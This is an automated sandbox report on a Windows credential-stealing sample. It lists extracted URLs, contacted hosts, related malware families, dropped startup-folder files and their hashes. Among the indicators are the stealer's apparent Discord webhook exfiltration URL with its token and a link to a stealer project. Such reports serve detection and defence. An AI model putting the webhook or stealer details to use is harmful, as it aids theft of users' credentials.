                                    https://www.youtube.com/:https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://discord.comhttps___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6DD0000.00000004.00000800.00020000.00000000.sdmp, https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB7261000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://mail.google.com/mail/:https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://docs.google.com/document/installwebapp?usp=chrome_defaulthttps___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://docs.google.com/presentation/:https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://docs.google.com/presentation/installwebapp?usp=chrome_defaulthttps___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://docs.google.com/document/:https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://docs.google.com/spreadsheets/Jhttps___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://go.microsofxpowershell.exe, 0000000E.00000002.1635457819.000001DEDBE41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://docs.google.com/spreadsheets/?usp=installed_webapphttps___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://mail.google.com/mail/Jhttps___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://contoso.com/powershell.exe, 00000012.00000002.1791808776.0000021A24BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1440681489.000001F9DDF84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1627400325.000001DED3ABC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1564105869.000001DEC5308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1627400325.000001DED3BF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1791808776.0000021A24D02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1675792920.0000021A1647A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1791808776.0000021A24BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://docs.google.com/spreadsheets/:https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://drive.google.com/?lfhs=2https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://ip-api.comhttps___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB71C1000.00000004.00000800.00020000.00000000.sdmp, https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB7190000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://github.com/PyDevOG/Divulge-StealerTqmmU.scr.0.drfalse
                                                                    high
                                                                    https://oneget.orgXpowershell.exe, 0000000E.00000002.1564105869.000001DEC4EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.youtube.com/s/notifications/manifest/cr_install.htmlhttps___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehttps___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1423393930.000001F9CDF11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1459431559.0000022300084000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1564105869.000001DEC3A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1675792920.0000021A14B51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.youtube.com/?feature=ytcahttps___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-https___files.catbox.moe_l2rczc.pif.exe, TqmmU.scr.0.drfalse
                                                                            high
                                                                            https://www.youtube.com/Jhttps___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1440681489.000001F9DDF84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1627400325.000001DED3ABC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1564105869.000001DEC5308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1627400325.000001DED3BF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1791808776.0000021A24D02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1675792920.0000021A1647A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1791808776.0000021A24BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000000E.00000002.1564105869.000001DEC4EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://discord.comhttps___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6DD0000.00000004.00000800.00020000.00000000.sdmp, https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB7261000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://discord.com/api/v10/users/TqmmU.scr.0.drfalse
                                                                                      high
                                                                                      https://drive.google.com/:https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000012.00000002.1675792920.0000021A14D82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.1423393930.000001F9CE138000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000012.00000002.1675792920.0000021A14D82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://go.micropowershell.exe, 00000012.00000002.1675792920.0000021A15FF3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://contoso.com/Iconpowershell.exe, 00000012.00000002.1791808776.0000021A24BCC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://drive.google.com/Jhttps___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000012.00000002.1675792920.0000021A14D82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://crl.micropowershell.exe, 00000002.00000002.1447575965.000001F9E65E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://docs.google.com/spreadsheets/installwebapp?usp=chrome_defaulthttps___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.1423393930.000001F9CE138000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://docs.google.com/presentation/?usp=installed_webapphttps___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://discord.com/api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8Tshttps___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6DD0000.00000004.00000800.00020000.00000000.sdmp, https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6A01000.00000004.00000800.00020000.00000000.sdmp, https___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB7261000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://aka.ms/pscore68powershell.exe, 00000002.00000002.1423393930.000001F9CDF11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1459431559.0000022300044000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1459431559.000002230005D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1564105869.000001DEC3A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1675792920.0000021A14B51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://ip-api.com/json/?fields=225545Phttps___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB71C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://docs.google.com/document/?usp=installed_webapphttps___files.catbox.moe_l2rczc.pif.exe, 00000000.00000002.1886451440.000001EBB6C43000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://go.mpowershell.exe, 0000000E.00000002.1635457819.000001DEDBE41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://oneget.orgpowershell.exe, 0000000E.00000002.1564105869.000001DEC4EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs
                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      208.95.112.1
                                                                                                                      ip-api.comUnited States
                                                                                                                      53334TUT-ASUSfalse
                                                                                                                      162.159.135.232
                                                                                                                      discord.comUnited States
                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                      Analysis ID:1569372
                                                                                                                      Start date and time:2024-12-05 18:22:35 +01:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 6m 36s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:22
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:0
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:https___files.catbox.moe_l2rczc.pif.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.adwa.spyw.evad.winEXE@26/22@2/2
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 20%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 62%
                                                                                                                      • Number of executed functions: 263
                                                                                                                      • Number of non-executed functions: 20
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      • Stop behavior analysis, all processes terminated
                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                                      • Excluded IPs from analysis (whitelisted): 172.217.17.35
                                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, gstatic.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 3964 because it is empty
                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7300 because it is empty
                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7668 because it is empty
                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7912 because it is empty
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                      • VT rate limit hit for: https___files.catbox.moe_l2rczc.pif.exe
                                                                                                                      TimeTypeDescription
                                                                                                                      12:23:31API Interceptor32x Sleep call for process: powershell.exe modified
                                                                                                                      12:23:42API Interceptor898x Sleep call for process: https___files.catbox.moe_l2rczc.pif.exe modified
                                                                                                                      12:23:44API Interceptor4x Sleep call for process: WMIC.exe modified
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      208.95.112.1LxgGXCC4AL.exeGet hashmaliciousXWormBrowse
                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                      LMm6yxQtcf.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                      • ip-api.com/json/
                                                                                                                      aZPQ3mKZSa.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                      GZC0n65Ggl.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                      aU1TV97585.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                      mG93k6iBl4.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                      2zaGROpmo0.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                      OFFcN5333E.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                      m30zZYga23.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                      Z4ChhoiwJW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                      162.159.135.232S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                      • discord.com/admin.php
                                                                                                                      18561381.exeGet hashmaliciousRedLineBrowse
                                                                                                                      • discord.com/channels/948610961449816084/948610961449816086/948611091527774228
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      discord.comVzhY4BcvBH.exeGet hashmaliciousAsyncRAT, RedLine, StormKitty, VenomRATBrowse
                                                                                                                      • 162.159.136.232
                                                                                                                      5QnwxSJVyX.docGet hashmaliciousUnknownBrowse
                                                                                                                      • 162.159.136.232
                                                                                                                      speedymaqing.exeGet hashmaliciousPython Stealer, Discord Token StealerBrowse
                                                                                                                      • 162.159.138.232
                                                                                                                      main.exeGet hashmaliciousBlank Grabber, SilentXMRMiner, XmrigBrowse
                                                                                                                      • 162.159.135.232
                                                                                                                      EsgeCzT4do.exeGet hashmaliciousXWormBrowse
                                                                                                                      • 162.159.137.232
                                                                                                                      cmd.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                      • 162.159.128.233
                                                                                                                      spacers.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 162.159.138.232
                                                                                                                      EternalPredictor.exeGet hashmaliciousBlank Grabber, Skuld Stealer, XWormBrowse
                                                                                                                      • 162.159.128.233
                                                                                                                      program.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                      • 162.159.137.232
                                                                                                                      RuntimeusererVers.exeGet hashmaliciousPython StealerBrowse
                                                                                                                      • 162.159.138.232
                                                                                                                      ip-api.comLxgGXCC4AL.exeGet hashmaliciousXWormBrowse
                                                                                                                      • 208.95.112.1
                                                                                                                      LMm6yxQtcf.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                      • 208.95.112.1
                                                                                                                      aZPQ3mKZSa.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 208.95.112.1
                                                                                                                      GZC0n65Ggl.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 208.95.112.1
                                                                                                                      aU1TV97585.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 208.95.112.1
                                                                                                                      mG93k6iBl4.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 208.95.112.1
                                                                                                                      2zaGROpmo0.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                      • 208.95.112.1
                                                                                                                      OFFcN5333E.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 208.95.112.1
                                                                                                                      m30zZYga23.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 208.95.112.1
                                                                                                                      Z4ChhoiwJW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 208.95.112.1
                                                                                                                      s-part-0035.t-0009.t-msedge.netECtxws3Hug.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.246.63
                                                                                                                      rundll32.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.246.63
                                                                                                                      fmlgbgc2p5.exeGet hashmaliciousNeconydBrowse
                                                                                                                      • 13.107.246.63
                                                                                                                      izCOFC8OWh.exeGet hashmaliciousUnknownBrowse
                                                                                                                      • 13.107.246.63
                                                                                                                      QiGA4zxp7h.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 13.107.246.63
                                                                                                                      f5TWdT5EAc.exeGet hashmaliciousPhorpiex, RHADAMANTHYS, XmrigBrowse
                                                                                                                      • 13.107.246.63
                                                                                                                      lj8shy7Er0.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 13.107.246.63
                                                                                                                      BUE1EnkN5v.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      • 13.107.246.63
                                                                                                                      http://web-quorvyn.azurewebsites.netGet hashmaliciousTechSupportScamBrowse
                                                                                                                      • 13.107.246.63
                                                                                                                      8JuGuaUaZP.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 13.107.246.63
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      CLOUDFLARENETUSNIsNyN2CTq.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      • 172.67.177.134
                                                                                                                      H61PaEPFJC.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                      • 104.21.67.152
                                                                                                                      FW Microsoft account unusual sign-in activity.msgGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.18.11.207
                                                                                                                      PaVWrYb4F2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 104.21.67.152
                                                                                                                      EI0WLvSYFS.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 172.67.160.80
                                                                                                                      2xVbI4Oc7A.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 104.21.67.152
                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                      • 104.21.16.9
                                                                                                                      EROgfpPcsL.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                      • 104.21.67.152
                                                                                                                      lC7L7oBBMC.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 104.26.13.205
                                                                                                                      https://tippfloorcovering-my.sharepoint.com/:f:/g/personal/inderjeet_tippfloor_com/EpEIzIGDzrlMs2z8rWgki5MBO5-d64iEaOqqeF3ulFqTiw?e=T39wglGet hashmaliciousUnknownBrowse
                                                                                                                      • 104.17.25.14
                                                                                                                      TUT-ASUSLxgGXCC4AL.exeGet hashmaliciousXWormBrowse
                                                                                                                      • 208.95.112.1
                                                                                                                      LMm6yxQtcf.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                      • 208.95.112.1
                                                                                                                      aZPQ3mKZSa.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 208.95.112.1
                                                                                                                      GZC0n65Ggl.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 208.95.112.1
                                                                                                                      aU1TV97585.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 208.95.112.1
                                                                                                                      mG93k6iBl4.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 208.95.112.1
                                                                                                                      2zaGROpmo0.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                      • 208.95.112.1
                                                                                                                      OFFcN5333E.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 208.95.112.1
                                                                                                                      m30zZYga23.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 208.95.112.1
                                                                                                                      Z4ChhoiwJW.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 208.95.112.1
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0eNIsNyN2CTq.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      • 162.159.135.232
                                                                                                                      PaVWrYb4F2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 162.159.135.232
                                                                                                                      2xVbI4Oc7A.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      • 162.159.135.232
                                                                                                                      lC7L7oBBMC.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 162.159.135.232
                                                                                                                      0wxckB4Iba.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                      • 162.159.135.232
                                                                                                                      OHScaqAPjt.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                                      • 162.159.135.232
                                                                                                                      8JuGuaUaZP.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 162.159.135.232
                                                                                                                      lUy4SKlE6A.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                      • 162.159.135.232
                                                                                                                      DX7V71Ro7b.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      • 162.159.135.232
                                                                                                                      xFHqehx1tb.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                                                                                      • 162.159.135.232
                                                                                                                      No context
                                                                                                                      Process:C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):190464
                                                                                                                      Entropy (8bit):5.995125051419421
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:L+AIo6iee4xc7I+g4A9PtLmMf8noNM3MWQ/s17LVHEEPX9p8lt1WkXBkrY1SZbBc:LGo6iee4xUZA9Pt6Mf8noNM3MWQ/s17P
                                                                                                                      MD5:E09F55D421CB45340A8C97C217BA56CF
                                                                                                                      SHA1:2280AFE7BB2D07C315E2599C21F069DD1B7CE3B8
                                                                                                                      SHA-256:1E8D2F6FA4B8D1EC630758422C493DE85D367F2EB7C76B452B9843ED2B2A7BFF
                                                                                                                      SHA-512:0D690F46D18855009AF0B15A8E352DBE178DE4D0F055FAB00CC18837AD30AEE3FFFFEF5263BB6598FF0E6BA7DBB55029CE976101BE853CB03B01B9B440418C8B
                                                                                                                      Malicious:true
                                                                                                                      Yara Hits:
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\TqmmU.scr, Author: Joe Security
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............^.... ........@.. .......................@............`.....................................O.......P.................... ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...P...........................@..@.reloc....... ......................@..B................@.......H...........@T......0....................................................0..w.............%.T...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~.......t.*..0.............(....,..*r...ps....z..0..!..........,..o.............(....Q+...Q.*....0..5........(.......(....-#.,..o.....(....-..%-.&(......o....*.*&...(....*^......(.....(.........*^......(.....(.........*..0.......... ....s........(....-..*.o....*2.(....(....*..0..........
                                                                                                                      Process:C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):26
                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                      Malicious:true
                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                      Process:C:\Users\user\Desktop\https___files.catbox.moe_l2rczc.pif.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1965
                                                                                                                      Entropy (8bit):5.377802142292312
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHhAHKKkpLHDJHqHGHK+HKs:iq+wmj0qCYqGSI6owJtzHeqKkpLVKmqs
                                                                                                                      MD5:582A844EB067319F705A5ADF155DBEB0
                                                                                                                      SHA1:68B791E0F77249BF83CD4B23A6C4A773365E2CAD
                                                                                                                      SHA-256:E489CF4E6C01EFE8827F172607D7E3CD89C4870B0B0CA5A33EFE64577E2CB8A9
                                                                                                                      SHA-512:6F530A0E2D3910459AFEFD0295ACA93D3814AB98D9A6E2BE1C2B8B717F075C87EF908BBF955E38F7B976EC51ED512645D13D0FB60AC865867E573060C5D76B59
                                                                                                                      Malicious:true
